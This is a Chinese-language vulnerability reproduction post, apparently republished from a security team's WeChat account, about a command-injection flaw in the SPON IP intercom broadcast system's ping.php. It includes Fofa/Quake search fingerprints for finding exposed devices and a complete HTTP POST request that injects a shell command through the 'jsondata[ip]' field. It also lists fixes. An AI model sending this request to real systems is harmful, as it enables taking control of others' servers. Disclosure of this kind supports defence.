产品简介
世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
漏洞描述
世邦通信 SPON IP网络对讲广播系统 ping.php 存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器
网络空间测绘
Fofa
icon_hash="-1830859634"Quake
favicon: "e854b2eaa9e4685a95d8052d5e3165bc"
漏洞复现
POST /php/ping.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: close
jsondata[ip]=a|echo c4ca4238a0b923820dcc509a6f75849b&jsondata[type]=1
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】世邦通信 SPON IP网络对讲广播系统 ping.php 任意命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论